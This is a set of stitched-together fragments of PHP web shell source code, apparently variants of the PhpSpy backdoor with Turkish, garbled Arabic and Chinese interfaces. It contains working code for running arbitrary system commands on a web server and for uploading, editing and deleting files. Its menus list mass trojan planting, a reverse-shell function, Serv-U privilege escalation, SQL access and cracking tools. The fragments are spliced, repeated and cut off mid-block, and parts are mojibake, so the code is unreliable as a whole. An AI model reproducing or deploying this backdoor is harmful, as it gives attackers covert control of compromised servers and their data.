$dir = $_post['dir'];
$nowpath = getPath($pathname, $dir);
}
///////
$dir_writeable = dir_writeable($nowpath) ? "m" : "mm";
$phpinfo = !eregi("phpinfo", $dis_func) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = substr(PHP_OS, 0, 3) == 'WIN' ? " | <a href=\"?action=reg\"mohajer22</a>" : "";
$tb = new FORMS();
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>' . $_SERVER['HTTP_HOST'] . '</b></td><td><b>' . $mohajer . '</b></td><td align="right"><b>' . $_SERVER['REMOTE_ADDR'] . '</b></td></tr></table>', 'center', 'top');
$tb->tdbody("<FORM method='POST' action='{$REQUEST_URI}' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value=' dir ' id=input><INPUT type='submit'name='erne' value='erne ' id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>");
$tb->tablefooter();
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Dosya Duzenle Yada Olustur & Dosya Yukle & Dizin Olustur</b></td></tr></table>', 'center', 'top');
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
$tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>Dosya Duzenle weya Olustur:</FONT>' . $tb->makehidden('dir', getcwd()) . ' ' . $tb->makeinput('editfile') . ' ' . $tb->makeinput('Edit', 'Duzenle', '', 'submit')));
$tb->headerform(array('action' => '?dir=' . urlencode($dir), 'enctype' => 'multipart/form-data', 'content' => '<FONT COLOR=#9C9C9C>Dosya Yukle:</FONT>' . $tb->makeinput('uploadfile', '', '', 'file') . ' ' . $tb->makeinput('doupfile', 'Ekle', '', 'submit') . $tb->makeinput('uploaddir', $dir, '', 'hidden')));
$tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>Dizin Olustur:</FONT> ' . $tb->makeinput('newdirectory') . ' ' . $tb->makeinput('createdirectory', 'yenidizin', '', 'submit')));
$execfuncs = substr(PHP_OS, 0, 3) == 'WIN' ? array('system' => 'system', 'passthru' => 'passthru', 'exec' => 'exec', 'shell_exec' => 'shell_exec', 'popen' => 'popen', 'wscript' => 'Wscript.Shell') : array('system' => 'system', 'passthru' => 'passthru', 'exec' => 'exec', 'shell_exec' => 'shell_exec', 'popen' => 'popen');
$tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>cmd:</FONT>' . $tb->makeselect(array('name' => 'execfunc', 'option' => $execfuncs, 'selected' => $execfunc)) . ' ' . $tb->makeinput('command') . ' ' . $tb->makeinput('Run', 'command', '', 'submit')));
$tb->tdbody("</td></tr></table>");
if (!isset($_GET['action']) or empty($_GET['action']) or $_GET['action'] == "dir") {
$tb->tableheader();
echo "<tr bgcolor='#D0D0D0'><td align='center' nowrap width='27%'><b>DIR</b></td><td align='center' nowrap width='16%'><b>First data</b></td><td align='center' nowrap width='16%'><b>Last data</b></td><td align='center' nowrap width='11%'><b>Size</b></td><td align='center' nowrap width='6%'><b>Perm</b></td></tr>";
$dirs = @opendir($dir);
$dir_i = '0';
while ($file = @readdir($dirs)) {
$filepath = "{$dir}/{$file}";
$a = @is_dir($filepath);
if ($a == "1") {
if ($file != ".." && $file != ".") {
}
</SCRIPT>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<?php
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>' . $_SERVER['HTTP_HOST'] . '</b></td><td align="right"><b>' . $_SERVER['REMOTE_ADDR'] . '</b></td></tr></table>', 'center', 'top');
$tb->tdbody('<a href="?action=lo???ut">E???? C?I???</a> | <a href="?action=dir">?U?C? C????CE</a> | <a href="?action=phpenv">?????CE ?? C??????</a> | <a href="?action=proxy">E?????</a>' . $reg . $phpinfo . ' | <a href="?action=shell">?C??E C???C??</a> | <a href="?action=sql">??E??C?CE</a> | <a href="?action=sqlbak">?I? ??I? ?C?IE C?E?C?CE</a>');
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?php
$tb->headerform(array('method' => 'GET', 'content' => '<p>??C?? ??? C??????: ' . $pathname . '<br>??? ???? E????' . $dir_writeable . ',' . substr(base_convert(@fileperms($nowpath), 10, 8), -4) . '): ' . $nowpath . '<br>??OC? ???I ? C?II?? ????: ' . $tb->makeinput('dir') . ' ' . $tb->makeinput('', '???', '', 'submit') . ' '));
$tb->headerform(array('action' => '?dir=' . urlencode($dir), 'enctype' => 'multipart/form-data', 'content' => '??? ??? ??? C?????: ' . $tb->makeinput('uploadfile', '', '', 'file') . ' ' . $tb->makeinput('doupfile', '???', '', 'submit') . $tb->makeinput('uploaddir', $dir, '', 'hidden')));
$tb->headerform(array('action' => '?action=editfile&dir=' . urlencode($dir), 'content' => '??OC? ???: ' . $tb->makeinput('editfile') . ' ' . $tb->makeinput('createfile', '???', '', 'submit')));
$tb->headerform(array('content' => '??OC? ???I:' . $tb->makeinput('newdirectory') . ' ' . $tb->makeinput('createdirectory', '???', '', 'submit')));
?>
</table>
<hr width="775" noshade>
<?php
echo "<p><b>\n";
if (!empty($delfile)) {
if (file_exists($delfile)) {
echo @unlink($delfile) ? $delfile . " E¾³?³E¹¦!" : "I?¼?E¾³?E§°U!";
} else {
echo basename($delfile) . " I?¼???²»´?O?!";
}
} elseif (!empty($deldir)) {
}
</SCRIPT>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<?php
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>' . $_SERVER['HTTP_HOST'] . '</b></td><td align="right"><b>' . $_SERVER['REMOTE_ADDR'] . '</b></td></tr></table>', 'center', 'top');
$tb->tdbody('<a href="?action=logout">注销会话</a> | <a href="?action=dir">返回PhpSpy目录</a> | <a href="?action=phpenv">PHP环境变量</a> | <a href="?action=proxy">在线代理</a>' . $reg . $phpinfo . ' | <a href="?action=shell">WebShell</a> | <a href="?action=sql">SQL Query</a> | <a href="?action=sqlbak">MySQL Backup</a>');
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?php
$tb->headerform(array('method' => 'GET', 'content' => '<p>程序路径: ' . $pathname . '<br>当前目录(' . $dir_writeable . ',' . substr(base_convert(@fileperms($nowpath), 10, 8), -4) . '): ' . $nowpath . '<br>跳转目录: ' . $tb->makeinput('dir') . ' ' . $tb->makeinput('', '确定', '', 'submit') . ' 〖支持绝对路径和相对路径〗'));
$tb->headerform(array('action' => '?dir=' . urlencode($dir), 'enctype' => 'multipart/form-data', 'content' => '上传文件到当前目录: ' . $tb->makeinput('uploadfile', '', '', 'file') . ' ' . $tb->makeinput('doupfile', '确定', '', 'submit') . $tb->makeinput('uploaddir', $dir, '', 'hidden')));
$tb->headerform(array('action' => '?action=editfile&dir=' . urlencode($dir), 'content' => '新建文件在当前目录: ' . $tb->makeinput('editfile') . ' ' . $tb->makeinput('createfile', '确定', '', 'submit')));
$tb->headerform(array('content' => '新建目录在当前目录: ' . $tb->makeinput('newdirectory') . ' ' . $tb->makeinput('createdirectory', '确定', '', 'submit')));
?>
</table>
<hr width="775" noshade>
<?php
/*===================== 执行操作 开始 =====================*/
echo "<p><b>\n";
// 删除文件
if (!empty($delfile)) {
if (file_exists($delfile)) {
echo @unlink($delfile) ? $delfile . " 删除成功!" : "文件删除失败!";
} else {
echo basename($delfile) . " 文件已不存在!";
}
</SCRIPT>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<?php
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>' . $_SERVER['HTTP_HOST'] . '</b></td><td align="center">' . date("Y年m月d日 h:i:s", time()) . '</td><td align="right"><b>' . $_SERVER['REMOTE_ADDR'] . '</b></td></tr></table>', 'center', 'top');
$tb->tdbody(' | <a href="?action=dir">根目录</a> <a href="?action=dir">Shell 目录</a> | <a href="?action=phpenv">环境变量</a> | <a href="?action=proxy">在线代理</a>' . $reg . $phpinfo . ' | <a href="?action=shell">WebShell</a> | <a href="?action=crack">杂项破解</a> | <a href="?action=mix">解压mix.dll</a> | <a href="?action=logout">注销登录</a> |');
$tb->tdbody('| <a href="?action=plgm">批量挂马</a> | <a href="?action=downloads">Http 文件下载</a> | <a href="?action=search&dir=' . $dir . '">文件查找</a> | <a href="?action=eval">执行php脚本</a> | <a href="?action=sql">执行SQL语句</a> | <a href="?action=mysqlfun">Func反弹Shell</a> | <a href="?action=sqlbak">MySQL 备份</a> | <a href="?action=SUExp">Serv-U 提权</a> |');
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?php
$tb->headerform(array('method' => 'GET', 'content' => '<p>程序路径: ' . $pathname . '<br>当前目录(' . $dir_writeable . ',' . substr(base_convert(@fileperms($nowpath), 10, 8), -4) . '): ' . $nowpath . '<br>跳转目录: ' . $tb->makeinput('dir') . ' ' . $tb->makeinput('', '确定', '', 'submit') . ' 〖支持绝对路径和相对路径〗'));
$tb->headerform(array('action' => '?dir=' . urlencode($dir), 'enctype' => 'multipart/form-data', 'content' => '上传文件到当前目录: ' . $tb->makeinput('uploadfile', '', '', 'file') . ' ' . $tb->makeinput('doupfile', '确定', '', 'submit') . $tb->makeinput('uploaddir', $dir, '', 'hidden')));
$tb->headerform(array('action' => '?action=editfile&dir=' . urlencode($dir), 'content' => '新建文件在当前目录: ' . $tb->makeinput('editfile') . ' ' . $tb->makeinput('createfile', '确定', '', 'submit')));
$tb->headerform(array('content' => '新建目录在当前目录: ' . $tb->makeinput('newdirectory') . ' ' . $tb->makeinput('createdirectory', '确定', '', 'submit')));
?>
</table>
<hr width="775" noshade>
<?php
/*===================== 执行操作 开始 =====================*/
echo "<p><b>\n";
// 删除文件
if (!empty($delfile)) {
if (file_exists($delfile)) {
echo @unlink($delfile) ? $delfile . " 删除成功!" : "文件删除失败!";
} else {
echo basename($delfile) . " 文件已不存在!";
